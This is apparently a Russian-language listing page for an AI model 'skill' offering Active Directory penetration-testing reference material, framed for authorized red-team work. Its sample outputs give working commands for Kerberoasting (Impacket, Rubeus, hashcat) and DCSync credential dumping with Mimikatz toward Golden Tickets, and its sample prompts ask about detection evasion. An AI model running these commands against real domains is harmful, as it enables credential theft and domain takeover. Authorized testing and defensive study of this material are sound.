active-directory-attacks
Выполнение тестирования на проникновение Active Directory и оценок красной команды
Службам безопасности необходим комплексный справочный материал для авторизованных оценок Active Directory. Этот навык предоставляет документированные методы атак и команды инструментов для пентестеров, проводящих операции красной команды.
Скачать ZIP навыка
Загрузить в Claude
Перейдите в Settings → Capabilities → Skills → Upload skill
Включите и начните использовать
Протестировать
Использование «active-directory-attacks». Покажите команды Kerberoasting для домена example.local
Ожидаемый результат:
- Using Impacket from Linux: GetUserSPNs.py example.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
- Using Rubeus from Windows: .\Rubeus.exe kerberoast /outfile:hashes.txt
- Cracking with hashcat: hashcat -m 13100 hashes.txt rockyou.txt
Использование «active-directory-attacks». How do I perform a DCSync attack?
Ожидаемый результат:
- DCSync requires Replicating Directory Changes rights. Using Impacket: secretsdump.py example.local/admin:password@10.10.10.10 -just-dc
- Using Mimikatz: lsadump::dcsync /domain:example.local /user:krbtgt
- This extracts all domain password hashes including krbtgt for Golden Ticket creation
Аудит безопасности
Низкий рискThis skill contains documentation and reference material for Active Directory penetration testing techniques. Static analysis flagged 200+ patterns (PowerShell commands, tool references, IP addresses) but all are FALSE POSITIVES - the files are markdown documentation, not executable code. Content describes legitimate security tools (BloodHound, Impacket, Mimikatz) used by penetration testers. Risk is LOW because: (1) files are read-only reference material, (2) no code execution occurs, (3) content is educational for authorized security testing. Recommend adding disclaimer about authorized use only.
Проблемы высокого риска (2)
Проблемы среднего риска (2)
Проблемы низкого риска (2)
Факторы риска
⚙️ Внешние команды (4)
🌐 Доступ к сети (4)
📁 Доступ к файловой системе (2)
Обнаруженные паттерны
Оценка качества
Что вы можете построить
Планирование оценки красной команды
Консультанты по безопасности, готовящиеся к авторизованным оценкам AD, используют этот навык для планирования путей атак и выбора подходящих инструментов для масштаба ангажмента.
Исследование защиты синей команды
Команды оборонной безопасности изучают техники атак для понимания TTП противников и улучшения правил обнаружения для своих платформ SIEM и EDR.
Обучение и подготовка по безопасности
Инструкторы используют документированные техники для обучения студентов уязвимостям AD и правильным стратегиям исправления в контролируемых лабораторных средах.
Попробуйте эти промпты
Мне нужно выполнить авторизованную разведку Active Directory. Какие команды BloodHound следует использовать для перечисления пользователей, групп и компьютеров домена? Целевой домен - example.local с учетными данными user:password.
Покажите, как выполнить Kerberoasting против домена Active Directory. Включите команды для извлечения TGS-билетов с помощью Impacket и их взлома с помощью hashcat.
Я скомпрометировал низкопривилегированного пользователя домена. Какие рекомендуемые техники латерального движения для повышения привилегий? Сравните pass-the-hash, overpass-the-hash и атаки с делегацией.
Объясните, как достичь доминирования в домене с помощью атак DCSync и Golden Ticket. Включите предварительные требования, команды и соображения по избеганию обнаружения для каждой техники.
Лучшие практики
- Всегда получайте письменную авторизацию перед выполнением любых техник атак AD против производственных сред
- Документируйте все скомпрометированные учетные записи и доступные системы для отчетности клиента и руководства по исправлению
- Синхронизируйте время с контроллером домена перед атаками Kerberos, чтобы избежать сбоев из-за рассинхронизации часов
- Используйте скрытные техники, такие как ограничения перечисления пользователей, чтобы избежать блокировки учетных записей при распылении паролей
- Восстанавливайте любое измененное состояние системы (например, изменения пароля ZeroLogon) после завершения тестирования
Избегать
- Никогда не выполняйте команды атак против сред без явной письменной авторизации от владельца
- Не запускайте агрессивное распыление паролей, которое может заблокировать легитимные учетные записи пользователей
- Оставляйте Golden Tickets или другие механизмы персистентности без их документирования для удаления
- Не изменяйте объекты Active Directory, GPO или конфигурации в производственной среде без одобрения
Часто задаваемые вопросы
Является ли этот навык законным для использования?
Какие инструменты мне нужны для выполнения этих атак?
Может ли этот навык автоматически запускать атаки?
В чем разница между Kerberoasting и AS-REP Roasting?
Как обнаружить эти атаки в моей среде?
Что такое Golden Ticket и почему он опасен?
Сведения для разработчиков
Автор
sickn33Лицензия
MIT
Репозиторий
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/active-directory-attacksСсылка
main
Структура файлов